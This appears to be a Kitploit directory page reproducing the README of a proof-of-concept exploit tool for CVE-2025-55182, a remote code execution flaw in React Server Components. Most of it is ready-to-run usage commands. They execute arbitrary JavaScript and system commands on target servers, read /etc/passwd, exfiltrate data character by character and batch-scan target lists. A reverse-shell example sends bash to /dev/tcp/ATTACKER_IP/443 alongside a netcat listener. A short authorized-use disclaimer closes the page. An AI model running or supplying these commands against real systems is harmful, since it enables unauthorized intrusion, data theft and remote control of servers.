Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
React2Shell-CVE-2025-55182 — POC React2Shell-CVE-2025-55182 | Kitploit
Tools/GitHubGitHub/shadowroot97/react2shell-cve-2025-55182
Vulnerability ScannersExploitationWeb Application ExploitationPenetration TestingRemote Access ToolPayload Development
GitHubshadowroot97/react2shell-cve-2025-55182

React2Shell-CVE-2025-55182

POC React2Shell-CVE-2025-55182

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
View Repository
8 months agoNot yet reviewed

CVE-2025-55182 - React2Shell

root@kitploit:~
    ____  _____    _    ____ _____ ____  ____  _   _ _____ _     _
   |  _ \| ____|  / \  / ___|_   _|___ \/ ___|| | | | ____| |   | |
   | |_) |  _|   / _ \| |     | |   __) \___ \| |_| |  _| | |   | |
   |  _ <| |___ / ___ \ |___  | |  / __/ ___) |  _  | |___| |___| |___
   |_| \_\_____/_/   \_\____| |_| |_____|____/|_| |_|_____|_____|_____|
                                                    [ CVE-2025-55182 ]

Remote Code Execution Scanner for React Server Components (RSC)

CVE Python


Credits

RoleNameLink
Original ResearchLachlan Davidsongithub.com/lachlan2k

Based on the original PoC: React2Shell-CVE-2025-55182-original-poc


Overview

React2Shell is a comprehensive security scanner for CVE-2025-55182, a critical Remote Code Execution (RCE) vulnerability affecting React Server Components (RSC) implementations. This vulnerability allows unauthenticated attackers to execute arbitrary JavaScript code on the server through unsafe deserialization in the React Flight protocol.

Key Features

  • Multi-Variant Testing: Tests 4 different payload structures from original research
  • Version Detection: Identify vulnerable React and framework versions
  • RCE Verification: Confirm code execution via digest variation, timing, and OOB callbacks
  • OOB Testing: Support for Burp Collaborator and Interactsh
  • Custom Payloads: Execute arbitrary JavaScript on vulnerable servers
  • Data Extraction: Character-by-character data exfiltration
  • Professional Output: Clean, colored terminal output with evidence collection

Installation

root@kitploit:~
# Clone the repository
git clone https://github.com/Shadowroot97/POC-React2Shell-CVE-2025-55182.git
cd POC-React2Shell-CVE-2025-55182

# Install dependencies
pip install requests

# Run the scanner
python3 exploit_cve_2025_55182_v2.py -h

Usage

root@kitploit:~
usage: exploit_cve_2025_55182_v2.py [-h] [-t TARGET] [-f FILE] [-m {version,verify,custom}]
                                    [--js JS] [--extract] [--sleep SECONDS]
                                    [--callback URL] [--dns DOMAIN] [-v]
                                    [--no-color] [--timeout TIMEOUT]

Scan Modes

1. Version Mode (default)

Passively detects vulnerable React and framework versions:

root@kitploit:~
python3 exploit_cve_2025_55182_v2.py -t https://target.com

2. Verify Mode (-m verify)

Actively confirms RCE using multiple techniques and all 4 payload variants:

root@kitploit:~
# Basic verification (digest variation)
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify

# With time-based verification
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify --sleep 5

# With OOB callback (Burp Collaborator)
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify --callback abc123.oastify.com

# Full verification with verbose output
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify \
    --sleep 5 --callback abc123.oastify.com --dns abc123.oastify.com -v

3. Custom Mode (-m custom)

Execute arbitrary JavaScript payloads:

root@kitploit:~
# Get Node.js version
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "process.version" --extract

# Execute system command
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "require('child_process').execSync('id').toString()" --extract

# Read file
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "require('fs').readFileSync('/etc/passwd','utf8')" --extract

4. Batch Scan (-f)

Scan multiple URLs from a file and show only vulnerable targets:

root@kitploit:~
python3 exploit_cve_2025_55182_v2.py -f targets.txt

Examples

Basic Scans

root@kitploit:~
# Version detection (default mode)
python3 exploit_cve_2025_55182_v2.py -t https://target.com

# RCE verification
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify

# Batch scan multiple targets
python3 exploit_cve_2025_55182_v2.py -f targets.txt

# Verbose output
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify -v

Advanced Usage

root@kitploit:~
# Time-based + OOB verification
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify \
    --sleep 5 --callback your-id.oastify.com

# Extract server info
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "process.version" --extract

# Execute command
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "require('child_process').execSync('whoami').toString()" --extract

Reverse Shell

root@kitploit:~
# Start listener
nc -lvnp 443

# Execute reverse shell
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "process.mainModule.require('child_process').execSync('bash -c \"bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1\"')"

Disclaimer

This tool is provided for authorized security testing and educational purposes only.

  • Only use against systems you own or have explicit permission to test
  • Unauthorized access to computer systems is illegal
  • The authors are not responsible for misuse of this tool
  • Always follow responsible disclosure practices

References

  • CVE-2025-55182 - NVD
  • Original PoC by Lachlan Davidson
  • React Security Advisory
  • Next.js Security Advisory
  • React Server Components Documentation
Download Tool
ArgumentDescription
-t, --targetTarget URL (e.g., https://example.com)
-f, --fileFile with list of URLs (one per line) for batch scanning
-m, --modeScan mode: version (default), verify, or custom
--jsJavaScript code for custom mode
--extractExtract string result character by character
--sleep SECONDSTime-based RCE verification (verify mode)
--callback URLHTTP callback URL for OOB testing (verify mode)
--dns DOMAINDNS callback domain for OOB testing (verify mode)
-v, --verboseVerbose output with payload details
--no-colorDisable colored output
--timeout SECONDSHTTP request timeout (default: 30)